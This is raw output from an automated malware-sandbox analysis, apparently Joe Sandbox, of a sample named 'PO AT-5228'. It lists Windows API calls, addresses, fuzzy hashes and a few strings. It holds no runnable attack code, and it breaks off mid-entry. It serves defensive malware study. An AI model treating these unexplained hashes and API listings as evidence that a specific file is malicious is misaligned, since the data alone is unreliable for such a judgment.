                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: ac3d2492cf65be73c7ce8d5d01722da2d2725e45e41655482bbe9ade303d5d7b
                                                                                        • Instruction ID: 692a1aa0b4cfd4ace9f00943e39d49de6d4c58d58a0ca0e3e8dd5ff0039e067b
                                                                                        • Opcode Fuzzy Hash: ac3d2492cf65be73c7ce8d5d01722da2d2725e45e41655482bbe9ade303d5d7b
                                                                                        • Instruction Fuzzy Hash: 77110C72000149BFDF119F90DC88FDA7F6DEB08360F048156BE189A161D7719D55DBA0
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00B9E1C0
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B9E1D1
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B9E1D8
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B9E1E0
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B9E1F7
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00B9E209
                                                                                          • Part of subcall function 00B99AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00B99A05,00000000,00000000,?,00B99DDB), ref: 00B9A53A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                        • String ID:
                                                                                        • API String ID: 603618608-0
                                                                                        • Opcode ID: 369525c4e19bfb91a4a6ab3d6b207e02f24c628882ef796df71a8ff57f018d41
                                                                                        • Instruction ID: 465b3a950918bdab93f65673512d0eca78275a5546dae73cf7c3ba71e375700a
                                                                                        • Opcode Fuzzy Hash: 369525c4e19bfb91a4a6ab3d6b207e02f24c628882ef796df71a8ff57f018d41
                                                                                        • Instruction Fuzzy Hash: 180184B5A00254BFEF109BA58C45B5EBFB9EF48751F044066EA04AB290DA719C00CB60
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 00B87B47
                                                                                          • Part of subcall function 00B8123A: __initp_misc_winsig.LIBCMT ref: 00B8125E
                                                                                          • Part of subcall function 00B8123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B87F51
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B87F65
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B87F78
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B87F8B
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B87F9E
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B87FB1
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B87FC4
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B87FD7
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B87FEA
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B87FFD
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B88010
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B88023
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B88036
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B88049
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B8805C
                                                                                          • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00B8806F
                                                                                        • __mtinitlocks.LIBCMT ref: 00B87B4C
                                                                                          • Part of subcall function 00B87E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00C1AC68,00000FA0,?,?,00B87B51,00B85E77,00C16C70,00000014), ref: 00B87E41
                                                                                        • __mtterm.LIBCMT ref: 00B87B55
                                                                                          • Part of subcall function 00B87BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B87B5A,00B85E77,00C16C70,00000014), ref: 00B87D3F
                                                                                          • Part of subcall function 00B87BBD: _free.LIBCMT ref: 00B87D46
                                                                                          • Part of subcall function 00B87BBD: DeleteCriticalSection.KERNEL32(00C1AC68,?,?,00B87B5A,00B85E77,00C16C70,00000014), ref: 00B87D68
                                                                                        • __calloc_crt.LIBCMT ref: 00B87B7A
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B87BA3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 2942034483-0
                                                                                        • Opcode ID: 92ae30d8221ed9205dc5d56e04da96330d38c499c4ac9bd64409275023fbc946
                                                                                        • Instruction ID: 4a43933cb6f16cbacf5cf2505e65e6984bd90daf046e0e36019173d6f99f5043
                                                                                        • Opcode Fuzzy Hash: 92ae30d8221ed9205dc5d56e04da96330d38c499c4ac9bd64409275023fbc946
                                                                                        • Instruction Fuzzy Hash: 55F06D3219D65219E628BA34BD16B4A26CA9B02739B3046E9F9A4D50F2EF20C842C361
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B6281D
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B62825
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B62830
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B6283B
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B62843
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B6284B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: c7b622aa08772ac49e01a6d3db309df3ddafb382845240b81a9c33d461985f6d
                                                                                        • Instruction ID: 6432f6e2e608fc2ff7827f59a56589754ea2ec08ef0546a9faee8ed741f982fe
                                                                                        • Opcode Fuzzy Hash: c7b622aa08772ac49e01a6d3db309df3ddafb382845240b81a9c33d461985f6d
                                                                                        • Instruction Fuzzy Hash: E7016CB0901B597DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 1423608774-0
                                                                                        • Opcode ID: 9e50ecbffef5ebd0b42ce2a80deb955424b92c3c09c4f74168996130027e4350
                                                                                        • Instruction ID: 8b0f140ae556233471b8019d6c70da4325d23ecd641486f6c4e0257837eeee32
                                                                                        • Opcode Fuzzy Hash: 9e50ecbffef5ebd0b42ce2a80deb955424b92c3c09c4f74168996130027e4350
                                                                                        • Instruction Fuzzy Hash: 2701A432206221ABDB151B58ECC8DEB77A9FF89701B04046AF603DB0A0DFB59C00EB51
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BA7C07
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BA7C1D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00BA7C2C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C3B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C45
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 7c2f2ab89f73bec1c7c4a2d44d82c2cf41d0a89d41f5006d7d815a5cc4138b8c
                                                                                        • Instruction ID: 91d22fc258f6d0a8f55f483109b4395c8743eaa1f06d379b7ba0754204ef0088
                                                                                        • Opcode Fuzzy Hash: 7c2f2ab89f73bec1c7c4a2d44d82c2cf41d0a89d41f5006d7d815a5cc4138b8c
                                                                                        • Instruction Fuzzy Hash: 50F03A72241198BFE7215B529C4EEEF7BBCEFC6B11F000158FA01AA051EBE05A41C6B5
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00BA9A33
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A44
                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A51
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A5E
                                                                                          • Part of subcall function 00BA93D1: CloseHandle.KERNEL32(?,?,00BA9A6B,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA93DB
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA9A71
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: f4dbe6b938103a31d41a0df968d4cf3c3ecc96d40c83910441fd390ad6c55fa4
                                                                                        • Instruction ID: faaa89866f0d9ab7685d56f2bcd8660d6345df3595377920af20052f34860160
                                                                                        • Opcode Fuzzy Hash: f4dbe6b938103a31d41a0df968d4cf3c3ecc96d40c83910441fd390ad6c55fa4
                                                                                        • Instruction Fuzzy Hash: 5DF05E32145251ABD7111BA4ECC9DAA7779FF85701B140466F6039A0A0DFB59801EB51
                                                                                        APIs
                                                                                          • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                                                          • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                                                        • __swprintf.LIBCMT ref: 00B61EA6
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B61D49
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 2125237772-557222456
                                                                                        • Opcode ID: 40ca21c109c9a512227387f1ea9e2b6c8a55d016c140009c565a083f91fbca7c
                                                                                        • Instruction ID: a1544626073b79d863028c252d13787974336e91a2121b1e71664f60b59d6cae
                                                                                        • Opcode Fuzzy Hash: 40ca21c109c9a512227387f1ea9e2b6c8a55d016c140009c565a083f91fbca7c
                                                                                        • Instruction Fuzzy Hash: 1D917D715042029FDB14EF28C896C6ABBF4EF95700F0449AEF895972A1EB75ED04CB92
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BBB006
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BBB115
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BBB298
                                                                                          • Part of subcall function 00BA9DC5: VariantInit.OLEAUT32(00000000), ref: 00BA9E05
                                                                                          • Part of subcall function 00BA9DC5: VariantCopy.OLEAUT32(?,?), ref: 00BA9E0E
                                                                                          • Part of subcall function 00BA9DC5: VariantClear.OLEAUT32(?), ref: 00BA9E1A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: e2a6f2892c9e1664ddc25287d618bd091720491213c316a099be485f3b83d02c
                                                                                        • Instruction ID: 224a7373748b010327b9fe0e440de3cd071e534e521fb34891b301298a67828d
                                                                                        • Opcode Fuzzy Hash: e2a6f2892c9e1664ddc25287d618bd091720491213c316a099be485f3b83d02c
                                                                                        • Instruction Fuzzy Hash: B7915C706083059FCB10DF28C495DAABBF4EF89704F1448ADF89A9B361DBB1E945CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                                                        • _memset.LIBCMT ref: 00BA5438
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00BA5467
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BA5513
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BA553D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: cdb3f74c8d226e49074b7afd59291b2efb748c649ab72f7a8392a1cdb948258c
                                                                                        • Instruction ID: b7e17f2f8f79e931d9b212e44d38047068b39abcf53b1f49e94b9aa4894757fe
                                                                                        • Opcode Fuzzy Hash: cdb3f74c8d226e49074b7afd59291b2efb748c649ab72f7a8392a1cdb948258c
                                                                                        • Instruction Fuzzy Hash: 6751037150C7019BD7249B28C8817BFB7E9EFA6750F0406A9F896D3291DBA0CE44CB52
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA027B
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BA02B1
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BA02C2
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA0344
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 2a1cddf12568eabc044c1237b05e246ee81c72791fc1c409d9fc40ed01d0f53e
                                                                                        • Instruction ID: 0ffd398393b021754daef6f770b0743d3e403448c9155f882251bdf3921f5b63
                                                                                        • Opcode Fuzzy Hash: 2a1cddf12568eabc044c1237b05e246ee81c72791fc1c409d9fc40ed01d0f53e
                                                                                        • Instruction Fuzzy Hash: 04415BB1618204EFDF05EF54C8C5B9A7BF9EF4A311F1480E9A9099F206D7B1D944CBA4
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA5075
                                                                                        • GetMenuItemInfoW.USER32 ref: 00BA5091
                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00BA50D7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C21708,00000000), ref: 00BA5120
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: 9575ff8d177b29444c72776eea8416713347d9a3e0a0d207bee069a15bb1efb4
                                                                                        • Instruction ID: c4d6a304a4db12d333be1e3150108996d7c964cfbea52c2fdc050fc1e27d6d32
                                                                                        • Opcode Fuzzy Hash: 9575ff8d177b29444c72776eea8416713347d9a3e0a0d207bee069a15bb1efb4
                                                                                        • Instruction Fuzzy Hash: 5741C371208741AFD730DF24D885F6ABBE4EF86324F14469EF855A7291D770EA00CB62
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00BC0587
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 2358735015-567219261
                                                                                        • Opcode ID: e95617ca3908c3eeaf570e3eb0c66ba73713e36f1e0be685006cec511d8d3e1f
                                                                                        • Instruction ID: de791093e389b1fe2a1db9134b112d7d3253e0282dfee89f69eb66ef1d37856a
                                                                                        • Opcode Fuzzy Hash: e95617ca3908c3eeaf570e3eb0c66ba73713e36f1e0be685006cec511d8d3e1f
                                                                                        • Instruction Fuzzy Hash: 2531907051021AABCF00EF68C841EEEB3F8FF55310B0086A9E866A72D1DB75E915CB40
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B9B88E
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B9B8A1
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B9B8D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: be50191fc8087afc9499d2501acd8fe0796b85d507e1cd7caf132694d90d8b14
                                                                                        • Instruction ID: 5b50aaa5f3adef0e46380a420f5571268d696f501a8eb721eb93e45d01edcd66
